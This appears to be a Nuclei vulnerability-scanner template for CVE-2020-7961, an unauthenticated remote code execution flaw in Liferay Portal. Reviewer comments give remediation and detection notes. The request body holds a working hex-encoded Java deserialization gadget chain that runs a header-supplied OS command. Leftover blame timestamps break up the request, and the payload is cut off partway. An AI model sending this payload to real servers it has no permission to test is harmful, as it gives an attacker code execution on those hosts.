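# Nuclei template metadata for CVE-2020-7961 (indentation restored; blame gutter removed).
# This is an active check, not a version fingerprint: the request further down asks the
# target to run an OS command and the matchers look for that command's output. A match
# therefore means the command ran on the host, and a scan will leave web-log and
# process-creation artifacts behind.
id: CVE-2020-7961

info:
  name: Liferay Portal Unauthenticated < 7.2.1 CE GA2 - Remote Code Execution
  author: dwisiswant0
  severity: critical
  # Root cause class is CWE-502 (deserialization of untrusted data), see classification below.
  description: Liferay Portal prior to 7.2.1 CE GA2 allows remote attackers to execute arbitrary code via JSON web services (JSONWS).
  # NOTE(review): only the upgrade path is given here; for hosts that cannot be upgraded
  # right away, check the vendor advisory in the references for interim guidance.
  remediation: |
    Upgrade Liferay Portal to version 7.2.1 CE GA2 or later to mitigate the vulnerability.
  reference:
    - https://www.synacktiv.com/en/publications/how-to-exploit-liferay-cve-2020-7961-quick-journey-to-poc.html
    - https://codewhitesec.blogspot.com/2020/03/liferay-portal-json-vulns.html
    - https://portal.liferay.dev/learn/security/known-vulnerabilities/-/asset_publisher/HbL5mxmVrnXW/content/id/117954271
    - https://nvd.nist.gov/vuln/detail/CVE-2020-7961
    - http://packetstormsecurity.com/files/157254/Liferay-Portal-Java-Unmarshalling-Remote-Code-Execution.html
  classification:
    # AV:N / PR:N / UI:N: reachable over the network with no credentials and no user interaction.
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2020-7961
    cwe-id: CWE-502
    # EPSS values are a point-in-time snapshot and drift; re-check before using them for prioritisation.
    epss-score: 0.97443
    epss-percentile: 0.99931
    # The CPE is pinned to the "community" target-software edition.
    # NOTE(review): confirm against the vendor advisory whether other editions in your estate are covered.
    cpe: cpe:2.3:a:liferay:liferay_portal:*:*:*:*:community:*:*:*
  metadata:
    # Two requests per target: one for each entry in the `command` payload list.
    max-request: 2
    vendor: liferay
    product: liferay_portal
  # `kev` marks the CVE as listed in CISA's Known Exploited Vulnerabilities catalog.
  tags: packetstorm,cve,cve2020,rce,liferay,kev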
http:
- raw:
- |
POST /api/jsonws/invoke HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
Referer: {{BaseURL}}/api/jsonws?contextName=&signature=%2Fexpandocolumn%2Fadd-column-4-tableId-name-type-defaultData
cmd2: {{command}}
|
2020-08-18 00:03:51 +00:00
|
|
|
|
2023-07-20 07:43:09 +00:00
|
|
|
cmd=%7B%22%2Fexpandocolumn%2Fadd-column%22%3A%7B%7D%7D&p_auth={{to_lower(rand_text_alpha(5))}}&formDate=1597704739243&tableId=1&name=A&type=1&%2BdefaultData:com.mchange.v2.c3p0.WrapperConnectionPoolDataSource=%7B%22userOverridesAsString%22%3A%22HexAsciiSerializedMap%3AACED0005737200116A6176612E7574696C2E48617368536574BA44859596B8B7340300007870770C000000023F40000000000001737200346F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E6B657976616C75652E546965644D6170456E7472798AADD29B39C11FDB0200024C00036B65797400124C6A6176612F6C616E672F4F626A6563743B4C00036D617074000F4C6A6176612F7574696C2F4D61703B7870740003666F6F7372002A6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E6D61702E4C617A794D61706EE594829E7910940300014C0007666163746F727974002C4C6F72672F6170616368652F636F6D6D6F6E732F636F6C6C656374696F6E732F5472616E73666F726D65723B78707372003A6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E66756E63746F72732E436861696E65645472616E73666F726D657230C797EC287A97040200015B000D695472616E73666F726D65727374002D5B4C6F72672F6170616368652F636F6D6D6F6E732F636F6C6C656374696F6E732F5472616E73666F726D65723B78707572002D5B4C6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E5472616E73666F726D65723BBD562AF1D83418990200007870000000057372003B6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E66756E63746F72732E436F6E7374616E745472616E73666F726D6572587690114102B1940200014C000969436F6E7374616E7471007E00037870767200206A617661782E7363726970742E536372697074456E67696E654D616E61676572000000000000000000000078707372003A6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E66756E63746F72732E496E766F6B65725472616E73666F726D657287E8FF6B7B7CCE380200035B000569417267737400135B4C6A6176612F6C616E672F4F626A6563743B4C000B694D6574686F644E616D657400124C6A6176612F6C616E672F537472696E673B5B000B69506172616D54797065737400125B4C6A6176612F6C616E672F436C6173733B7870757200135B4C6A6176612E6C616E672E4F626A6563743B90CE589F1073296C02000078700000000074000B6E6577496E737
4616E6365757200125B4C6A6176612E6C616E672E436C6173733BAB16D7AECBCD5A990200007870000000007371007E00137571007E00180000000174000A4A61766153637269707474000F676574456E67696E6542794E616D657571007E001B00000001767200106A6176612E6C616E672E537472696E67A0F0A4387A3BB34202000078707371007E0013757200135B4C6A6176612E6C616E672E537472696E673BADD256E7E91D7B470200007870000000017404567661722063757272656E74546872656164203D20636F6D2E6C6966657261792E706F7274616C2E736572766963652E53657276696365436F6E746578745468726561644C6F63616C2E67657453657276696365436F6E7465787428293B0A76617220697357696E203D206A6176612E6C616E672E53797374656D2E67657450726F706572747928226F732E6E616D6522292E746F4C6F7765724361736528292E636F6E7461696E73282277696E22293B0A7661722072657175657374203D2063757272656E745468726561642E6765745265717565737428293B0A766172205F726571203D206F72672E6170616368652E636174616C696E612E636F6E6E6563746F722E526571756573744661636164652E636C6173732E6765744465636C617265644669656C6428227265717565737422293B0A5F7265712E73657441636365737369626C652874727565293B0A766172207265616C52657175657374203D205F7265712E6765742872657175657374293B0A76617220726573706F6E7365203D207265616C526571756573742E676574526573706F6E736528293B0A766172206F757470757453747265616D203D20726573706F6E73652E6765744F757470757453747265616D28293B0A76617220636D64203D206E6577206A6176612E6C616E672E537472696E6728726571756573742E6765744865616465722822636D64322229293B0A766172206C697374436D64203D206E6577206A6176612E7574696C2E41727261794C69737428293B0A7661722070203D206E6577206A6176612E6C616E672E50726F636573734275696C64657228293B0A696628697357696E297B0A20202020702E636F6D6D616E642822636D642E657865222C20222F63222C20636D64293B0A7D656C73657B0A20202020702E636F6D6D616E64282262617368222C20222D63222C20636D64293B0A7D0A702E72656469726563744572726F7253747265616D2874727565293B0A7661722070726F63657373203D20702E737461727428293B0A76617220696E70757453747265616D526561646572203D206E6577206A6176612E696F2E496E70757453747265616D5265616465722870726F636573732E676574496E707574537
47265616D2829293B0A766172206275666665726564526561646572203D206E6577206A6176612E696F2E42
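# Belongs to the `- raw:` request entry under `http:` (indentation restored relative to this key).
# Each value is substituted into the `cmd2: {{command}}` request header, one request per value.
# Both commands only print host/OS information; neither changes state on the target.
# Defender-side indicators visible in this template: a POST to /api/jsonws/invoke that carries
# a `cmd2` header and a `defaultData:com.mchange.v2.c3p0.WrapperConnectionPoolDataSource`
# parameter, followed by the application server spawning `bash -c` or `cmd.exe /c`.
payloads:
  command:
    - "systeminfo" # Windows
    - "lsb_release -a" # Linux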
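# Belongs to the `- raw:` request entry under `http:` (indentation restored relative to this key).
# `and`: the response must satisfy BOTH matchers below (command output present AND HTTP 200).
matchers-condition: and
matchers:
  # Looks for the output of the probe command in the response. No `part` is set here, so
  # nuclei's default applies (the response body for HTTP; the extractor names it explicitly).
  # Either pattern is enough (`condition: or`): the first matches `systeminfo` output on
  # Windows, the second matches `lsb_release -a` output on Linux.
  # Caveat for triage: a Linux host without `lsb_release` installed (e.g. a minimal container
  # image) prints no "Distributor ID:" line, so a non-match does not prove the host is patched.
  # Confirm the installed Liferay version separately.
  - type: regex
    regex:
      - "OS Name:.*Microsoft Windows"
      - "Distributor ID:"
    condition: or

  # Requires a successful response; error pages that happen to echo text are excluded.
  - type: status
    status:
      - 200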
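# Belongs to the `- raw:` request entry under `http:` (indentation restored relative to this key).
# Pulls the OS identification string out of the command output so it appears in the finding.
# NOTE(review): no `group` is set, so the reported value is presumably the whole match rather
# than only the captured `(.*)` part; confirm against the nuclei extractor defaults.
# The extracted value is host reconnaissance data; handle scan output accordingly.
extractors:
  - type: regex
    regex:
      - "Microsoft Windows (.*)"
      - "Distributor ID: (.*)"
    part: body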